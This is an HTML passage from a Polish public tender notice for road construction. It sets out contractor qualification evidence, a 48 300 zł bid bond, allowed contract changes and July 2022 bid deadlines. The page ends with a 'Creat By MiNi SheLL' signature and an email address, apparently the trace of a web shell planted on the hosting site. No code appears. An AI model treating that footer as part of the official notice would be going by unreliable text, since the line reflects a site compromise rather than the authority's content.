odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami w zakresie jw., należącą do<br/>właściwej izby samorządu zawodowego oraz posiadająca doświadczenie na stanowisku kierownika budowy lub kierownika<br/>robót drogowych na minimum jednym zadaniu polegającym na budowie, przebudowie, rozbudowie lub remoncie drogi<br/>publicznej minimum klasy Z, w zakresie czego było wykonanie nawierzchni jezdni na odcinku nie krótszym niż 500 mb, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">b)<br/>wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i<br/>podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i<br/>prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie<br/>jest w stanie uzyskać tych dokumentów - inne dokumenty - Zamawiający nie wymaga złożenia do oferty informacji o robotach<br/>budowlanych niewykonanych lub wykonanych nienależycie. Zamawiający wymaga wykazania tylko zamówień niezbędnych dla<br/>spełnienia warunku określonego w SIWZ<br/>c) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień, niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; wzór<br/>wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego stanowi Załącznik do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenie wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o <br/>którym mowa w art. 125 ust. 1 ustawy w zakresie art. 108 ust .1 pkt 1, 3, 4, 5 podstaw <br/>wykluczenia z postępowania oraz art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o <br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na <br/>Ukrainę służących ochronie bezpieczeństwa narodowego</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przypadku powołania się na rozwiązania równoważne Zamawiający żąda złożenia przedmiotowych środków <br/>dowodowych wraz z ofertą. <br/>W przypadku gdyż wykonawca nie złoży wraz z ofertą przedmiotowych środków dowodowych lub złożone <br/>przedmiotowe środki dowodowe okrążą się niekompletne Zamawiający wezwie do ich złożenia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 48 300,00 zł <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 48 300,00 zł <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1)z powodu zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy mających wpływ na zakres lub <br/>termin wykonania niniejszej umowy w zakresie niezbędnym do dostosowania się do nowych przepisów, <br/>2) wystąpienia niebezpieczeństwa kolizji z innymi równolegle prowadzonymi robotami przez Zamawiającego lub inne <br/>podmioty w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji, <br/>3) w przypadku zmiany stawki podatku VAT wprowadzonej przez władzę ustawodawczą w trakcie trwania <br/>niemniejszej umowy, <br/>4) w przypadku nałożenia ograniczeń związanych z działaniem koronawirusa (wirusa SARS-CoV – 2) przejawiającym <br/>się jako epidemia, pandemia lub kwarantanna, ale w sytuacji gdy ich zakres będzie większy niż zakres <br/>zaobserwowany w dniu otwarcia ofert i jeżeli będą miały faktyczny wpływ na realizację niniejszej umowy, <br/>5) w zakresie zmiany terminów wynikających z umowy <br/>6) w zakresie zmiany materiałów, urządzeń, rozwiązań technicznych itp. W stosunku do przewidzianych w SWZ wraz <br/>załącznikami pod warunkiem, że zamiany te nie pogorszą właściwości funkcjonalno-użytkowych obiektu, o którym <br/>mowa w § 1 i będą korzystne dla Zamawiającego. Zmiany te mogą dotyczyć okoliczności: <br/>a) powodujących poprawienie parametrów technicznych przedmiotu zamówienia, <br/>b) wynikających z aktualizacji rozwiązań z uwagi na postęp techniczny lub zmiany obowiązujących przepisów, <br/>c) powodujących obniżenie kosztów ponoszonych na eksploatację i konserwację wykonanego przedmiotu umowy, <br/>7) w zakresie zmniejszenia zakresu przedmiotu zamówienia określonego w SWZ wraz załącznikami pod warunkiem, <br/>że wykonanie całości przedmiotu zamówienia napotka istotne trudności, w szczególności spowodowane brakiem <br/>uzyskania planowanego dofinansowania ze środków zewnętrznych. Wykonawcy nie przysługują jakiekolwiek <br/>roszczenia związane z ograniczeniem zakresu realizacji umowy. Zmniejszenie zakresu umowy będzie <br/>proporcjonalne do zmniejszonych środków, <br/>8) w zakresie zmian personalnych wśród osób wyznaczonych do realizacji zamówienia pod warunkiem, iż <br/>nowowprowadzone osoby spełniają wymagania określone w postępowaniu o udzielenie zamówienia publicznego 9) w zakresie zmiany wynagrodzenia należnego Wykonawcy: <br/>a) w przypadku zmiany stawki podatku od towaru i usług oraz podatku akcyzowego, <br/>b) w przypadku wystąpienia robót dodatkowych, spisanych protokołem konieczności, niezbędnych do wykonania <br/>głównego przedmiotu zamówienia zaakceptowane przez Zamawiającego <br/>c) w przypadku zlecenia na wniosek Zamawiającego wykonania robót zamiennych, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-14 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdpotwock.eb2b.com.pl/edit-auction.html/349213</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-14 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com